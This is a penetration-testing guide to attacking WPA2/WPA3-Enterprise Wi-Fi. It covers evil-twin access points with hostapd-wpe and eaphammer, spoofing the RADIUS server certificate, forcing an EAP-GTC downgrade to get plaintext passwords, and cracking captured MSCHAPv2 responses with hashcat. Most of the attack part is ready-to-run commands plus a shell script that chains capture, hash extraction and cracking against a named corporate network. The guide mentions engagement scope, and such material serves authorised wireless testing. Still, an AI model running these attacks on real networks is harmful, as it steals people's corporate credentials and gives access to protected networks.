WPA-Enterprise Attacks

Exploitation

WPA-Enterprise (WPA2/WPA3-Enterprise) authenticates clients with 802.1X/EAP: the access point relays EAP to a RADIUS server, and the client only learns who that server is from the TLS certificate it presents. Common EAP methods are PEAP (usually MSCHAPv2 inside a TLS tunnel), EAP-TTLS (often PAP or MSCHAPv2 inside) and EAP-TLS (client certificates). Attacks therefore focus on standing up a rogue AP plus RADIUS server that captures the inner credentials, or on negotiating a weaker inner method than the client normally uses.

Attack Vectors

  • Evil Twin with hostapd-wpe: a rogue AP broadcasting the target SSID, backed by hostapd-wpe's patched RADIUS server that accepts any client. A client that completes PEAP or EAP-TTLS hands over its MSCHAPv2 challenge/response pair (or, with EAP-TTLS/PAP or EAP-GTC inside, the plaintext password).
  • Certificate Impersonation: the only thing that stops the evil twin is the client validating the RADIUS server certificate (trusted CA and expected server name). Supplicants configured without a CA, set to accept any server, or users who click through the certificate warning, accept the attacker's self-signed certificate. hostapd-wpe generates one; eaphammer's cert wizard lets you fill in subject fields that match the legitimate server.
  • Inner-Method Downgrade (often called PEAP downgrade): the rogue server offers the weakest phase-2 method the client will accept. EAP-GTC yields the plaintext password instead of a challenge/response; eaphammer's --negotiate gtc-downgrade (or --negotiate weakest) automates this.
  • Offline Dictionary Attack: a captured MSCHAPv2 challenge/response is cracked offline; the attacker never has to send guesses to the real network, so lockout policies do not apply.

Cracking MSCHAPv2 Challenge/Responses

The MSCHAPv2 NT response is built exactly like NetNTLMv1: the 16-byte NT hash is padded to 21 bytes, split into three DES keys, and each key encrypts the 8-byte challenge, giving a 24-byte response. Hashcat's NetNTLMv1 mode (5500) therefore applies. hostapd-wpe (and eaphammer, which wraps it) prints one ready-made line per authentication attempt after "hashcat NETNTLM:", in the format username::::response:challenge, where response is 48 hex characters and challenge is the 8-byte MSCHAPv2 challenge hash (16 hex characters). The username is part of the line, so no --username flag is needed. Because the third DES key only carries two bytes of NT hash, the NT hash itself can also be recovered by DES key search (hashcat-utils plus mode 14000) regardless of password strength; a wordlist attack is simply the fast path.

01-crack-mschap.sh
bash
hashcat -m 5500 hashes.txt /usr/share/wordlists/rockyou.txt

Using Eaphammer

Eaphammer automates WPA-Enterprise evil-twin attacks on top of a patched hostapd (hostapd-wpe): it handles the AP, the RADIUS side, certificates and credential logging from a single command line. Install it on Kali with its setup script.

02-install-eaphammer.sh
bash
git clone https://github.com/s0lst1c3/eaphammer
cd eaphammer
./kali-setup

Generate (or import) a server certificate with the wizard. It prompts for the subject fields; use values that match the legitimate RADIUS server's certificate (CN, organisation, and so on) so that clients which show the certificate to the user display familiar names. A client that properly validates the CA will still reject it, which is the control you are testing.

03-generate-certs.sh
bash
./eaphammer --cert-wizard

Launch an evil twin that accepts WPA-EAP and logs whatever credentials clients send. The ESSID must match the target network; pick the channel of the real AP, or one where your signal beats it for the clients you want to catch. Add --negotiate gtc-downgrade to attempt the EAP-GTC inner-method downgrade, which gives plaintext passwords from clients that accept it.

04-launch-evil-twin.sh
bash
./eaphammer -i wlan0 --channel 6 --auth wpa-eap --essid CorpWiFi --creds

The captive-portal mode targets an open evil twin rather than an EAP one: any client that associates is redirected to a login page you serve, so it catches users and devices willing to join an open network carrying the corporate name. eaphammer's --hostile-portal variant additionally tries to coerce Windows clients into sending NetNTLM hashes.

05-captive-portal.sh
bash
./eaphammer -i wlan0 --channel 6 --auth open --essid CorpWiFi --captive-portal
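As an added example that is not part of eaphammer, hostapd-wpe or the commands above, the following script wraps the evil-twin capture and the hashcat step into one workflow: it builds the eaphammer command line (plain credential capture, or the EAP-GTC downgrade variant), tees the console output to a log, extracts the "hashcat NETNTLM:" lines hostapd-wpe prints (eaphammer inherits that output), validates each against the -m 5500 layout, keeps one line per username and writes a hashes file. The sample log and every hex value in it are constructed for this example; the assumption is that the log-line layout matches hostapd-wpe's.

```sh
#!/bin/sh
# Added example, not code from eaphammer or hostapd-wpe. Assumes hostapd-wpe's
# "hashcat NETNTLM:" console lines; sample data below is constructed.
set -eu

EAPHAMMER=${EAPHAMMER:-./eaphammer}
WORDLIST=${WORDLIST:-/usr/share/wordlists/rockyou.txt}

# Print the eaphammer command line for one of two modes: "creds" captures
# MSCHAPv2 challenge/responses as-is; "gtc" adds the EAP-GTC inner-method
# downgrade so clients that accept it reveal plaintext passwords.
eaphammer_cmd() {
  _iface=$1; _channel=$2; _essid=$3; _mode=${4:-creds}
  case $_mode in
    creds) _extra='--creds' ;;
    gtc)   _extra='--creds --negotiate gtc-downgrade' ;;
    *)     echo "unknown mode: $_mode" >&2; return 1 ;;
  esac
  printf '%s -i %s --channel %s --auth wpa-eap --essid %s %s\n' \
    "$EAPHAMMER" "$_iface" "$_channel" "$_essid" "$_extra"
}

# Keep only the text that follows "hashcat NETNTLM:" on each log line.
extract_hashcat_lines() {
  sed -n 's/.*hashcat NETNTLM:[[:space:]]*//p'
}

# -m 5500 wants user::::<24-byte NT response, 48 hex>:<8-byte challenge, 16 hex>.
is_valid_netntlm() {
  printf '%s\n' "$1" | grep -Eq '^[^:[:space:]]+::::[0-9a-fA-F]{48}:[0-9a-fA-F]{16}$'
}

# stdin: raw console log; stdout: one well-formed line per username (first
# attempt wins; a retry by the same user cracks to the same password anyway).
build_hashes() {
  extract_hashcat_lines | while IFS= read -r _line; do
    if is_valid_netntlm "$_line"; then
      printf '%s\n' "$_line"
    else
      printf 'skipping malformed line: %s\n' "$_line" >&2
    fi
  done | awk -F: '!seen[$1]++'
}

# Constructed sample console output: jdoe twice (a retry), asmith once, and
# one truncated line. All hex values are made up for this example.
sample_log() {
  cat <<'EOF'
mschapv2: Mon Jan  1 10:00:01 2024
        username:       jdoe
        challenge:      6b:cb:26:8f:0c:0a:3f:8e
        response:       0c:1a:7f:4e:9d:2b:6a:3e:5f:8c:0d:1b:2a:3c:4d:5e:6f:7a:8b:9c:0d:1e:2f:3a
        hashcat NETNTLM:        jdoe::::0c1a7f4e9d2b6a3e5f8c0d1b2a3c4d5e6f7a8b9c0d1e2f3a:6bcb268f0c0a3f8e
mschapv2: Mon Jan  1 10:00:09 2024
        username:       jdoe
        hashcat NETNTLM:        jdoe::::a1b2c3d4e5f60718293a4b5c6d7e8f90a1b2c3d4e5f60718:1f2e3d4c5b6a7988
mschapv2: Mon Jan  1 10:02:41 2024
        username:       asmith
        hashcat NETNTLM:        asmith::::ffeeddccbbaa99887766554433221100ffeeddccbbaa9988:0123456789abcdef
        hashcat NETNTLM:        broken::::deadbeef:1234
EOF
}

# Live run: needs root and an AP-capable interface; console output goes to the
# terminal and to the log file for post-processing.
run_capture() {
  _log=$1; shift
  [ "$(id -u)" -eq 0 ] || { echo 'eaphammer needs root' >&2; return 1; }
  iw list 2>/dev/null | grep -q '^[[:space:]]*\* AP$' \
    || echo 'warning: iw list reports no AP-capable interface' >&2
  eval "$(eaphammer_cmd "$@")" 2>&1 | tee "$_log"
}

# Offline demo on the sample log; RUN=1 IFACE=wlan0 CHANNEL=6 ESSID=CorpWiFi
# (optionally MODE=gtc) runs the capture for real instead.
LOG=${LOG:-$(mktemp)}
if [ "${RUN:-0}" = 1 ]; then
  run_capture "$LOG" "$IFACE" "$CHANNEL" "$ESSID" "${MODE:-creds}"
else
  sample_log > "$LOG"
fi
HASHES=${HASHES:-$(mktemp)}
build_hashes < "$LOG" > "$HASHES"
printf '%s hash line(s) written to %s; crack with:\n  hashcat -m 5500 %s %s\n' \
  "$(wc -l < "$HASHES" | tr -d ' ')" "$HASHES" "$HASHES" "$WORDLIST"
```

Run without arguments to see the offline path: the malformed line is reported on stderr, the retry collapses into one entry, and the printed hashcat command is the same one shown in 01-crack-mschap.sh. The command line is printed by eaphammer_cmd before anything touches the radio so it can be reviewed against the engagement scope.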